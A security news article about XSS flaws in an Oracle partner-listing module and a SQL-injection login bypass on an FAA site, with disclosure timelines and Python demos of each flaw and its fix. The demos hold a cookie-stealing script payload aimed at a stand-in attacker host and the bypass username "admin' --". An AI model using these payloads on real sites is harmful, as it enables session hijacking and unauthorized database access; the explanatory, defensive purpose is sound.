Some vendors respond fast, while for others it takes a year
Researchers from the Vulnerability Laboratory have found that two other important public websites are vulnerable to remote attacks. This time, the sites belonging to the Federal Aviation Administration (FAA) and Oracle Solutions were identified as containing security flaws.

Ucha Gobejishvili, also known as longrifle0x, is the one who found a couple of cross-site scripting (XSS) vulnerabilities in the Oracle Solutions website.
One persistent (stored) and one non-persistent (reflected) weakness were identified. If exploited, they could allow a remote attacker, either with user interaction or through a local low-privileged account, to hijack customer, moderator, or administrator sessions.
A hijacked session could then be used for phishing and for manipulating content requests on the client or application side.
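The difference between the two XSS classes, and why a session can be hijacked through either of them, is easier to see in code. The following Python is an added illustration written for this article; it is not code from Vulnerability Laboratory's advisory or from Oracle's site. The partner-listing store, the function names and the payload string are all constructed for the demo.

```python
import html

# Constructed payload of the kind used to probe for XSS; it is an
# illustration, not a string taken from the advisory.
XSS_PAYLOAD = ("<script>new Image().src="
               "'https://attacker.invalid/?c='+document.cookie</script>")

# Constructed in-memory stand-in for a partner-listing store; the name and
# shape are hypothetical and do not describe the real Oracle module.
PARTNER_LISTINGS = {}


def save_listing(listing_id, company_name):
    """Store a partner name exactly as submitted. Storing is fine; the
    defect in a persistent XSS bug is in how the value is later rendered."""
    PARTNER_LISTINGS[listing_id] = company_name


def render_listing_unsafe(listing_id):
    """Persistent XSS: the stored value is concatenated into HTML unencoded,
    so every visitor who views the listing runs the attacker's script."""
    return "<li class='partner'>" + PARTNER_LISTINGS[listing_id] + "</li>"


def render_search_unsafe(query):
    """Non-persistent XSS: the request parameter is echoed straight back,
    so the script runs only for a victim who follows a crafted link."""
    return "<p>Results for: " + query + "</p>"


def render_listing_safe(listing_id):
    """Hardened: HTML-entity-encode untrusted data at the point of output.
    quote=True also encodes quotes, so the value is safe inside attributes."""
    escaped = html.escape(PARTNER_LISTINGS[listing_id], quote=True)
    return "<li class='partner'>" + escaped + "</li>"


def render_search_safe(query):
    """Hardened reflected case: same encoding applied to the echoed parameter."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def session_cookie_header(token):
    """Defence in depth: with HttpOnly set, document.cookie cannot read the
    session id, so a script that does get injected cannot exfiltrate it."""
    return ("Set-Cookie: SESSIONID=" + token
            + "; Path=/; Secure; HttpOnly; SameSite=Lax")


def contains_live_script(rendered):
    """Demo check: does the output still contain a literal <script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    save_listing(1, XSS_PAYLOAD)
    print("stored, unsafe   :", contains_live_script(render_listing_unsafe(1)))
    print("stored, safe     :", contains_live_script(render_listing_safe(1)))
    print("reflected, unsafe:", contains_live_script(render_search_unsafe(XSS_PAYLOAD)))
    print("reflected, safe  :", contains_live_script(render_search_safe(XSS_PAYLOAD)))
    print(session_cookie_header("0123456789abcdef"))
```

The stored variant is the more serious of the two because the payload fires for every visitor, moderators and administrators included, without any link-clicking; the reflected one needs the victim to be lured to a crafted URL, which is why the advisory speaks of user interaction. Output encoding closes both holes; the HttpOnly flag is the caveat a practitioner adds so that a missed encoding spot does not hand over the session cookie.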
The vendor was notified of the issue on December 28, 2011, and responded two days later. A patch was issued on January 17, 2012, and the Vulnerability Laboratory publicly disclosed the problems eleven days after that.
The bug found in the Partner Search Listing module was rated as medium risk.
The situation with the FAA was different. The security researchers notified it on three occasions: February 2, March 23 and July 19, 2011.
Sometime between those dates and January 28, 2012, the vendor responded and resolved the authentication bypass issue affecting its official site.
The vulnerability was found in the login form of the AFS Evaluation Application System, and it allowed a remote attacker to bypass authentication without valid credentials.
If exploited successfully, the flaw could have been used, via SQL injection, to take over the site's database management system and with it the academy's website.
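An authentication bypass in a login form that is also a SQL injection point almost always comes down to the same defect: the submitted username is spliced into the SQL text. The following Python is an added example written for this article, not code from the FAA application or from the advisory; the in-memory users table, the rows and the plaintext passwords are constructed purely so the query behaviour can be observed.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory table standing in for a login back end. The
    schema, rows and plaintext passwords are hypothetical and exist only to
    demonstrate the query; a real system stores salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("inspector", "correct horse", "evaluator"),
         ("admin", "battery staple", "administrator")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation. Whatever the user types
    becomes part of the SQL text, so a closing quote followed by a comment
    marker rewrites the WHERE clause and the password test never runs."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    """Same query with bound parameters. The driver sends the SQL and the
    values separately, so the input can only ever be compared as a literal."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


# Classic bypass string, constructed for the demo: closes the username
# literal and comments out the remainder of the statement.
BYPASS_USERNAME = "admin' --"


if __name__ == "__main__":
    conn = build_demo_db()
    print("vulnerable    :", login_vulnerable(conn, BYPASS_USERNAME, "anything"))
    print("parameterized :", login_parameterized(conn, BYPASS_USERNAME, "anything"))
    print("legit login   :", login_parameterized(conn, "admin", "battery staple"))
```

With the concatenating version, the statement that reaches the database is `SELECT username, role FROM users WHERE username = 'admin' --' AND password = 'anything'`, so the attacker is logged in as the administrator with no password at all. The same injection point that bypasses the login can carry any other SQL the database user is allowed to run, which is how a login-form bug escalates to control of the DBMS and of the site behind it. Parameterizing the query removes the whole class of problem; a single quote followed by a comment marker in a username field is also a cheap thing to alert on in web server logs.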
This was rated a critical-severity flaw, and it is a good thing the FAA addressed it, even if it took some time.
Many other websites have been found vulnerable in the past few days. Ucha Gobejishvili revealed XSS problems in sites such as those of Google, Ferrari and MTV, and a group of hackers called TeamHav0k found the same type of flaw in several major US government sites.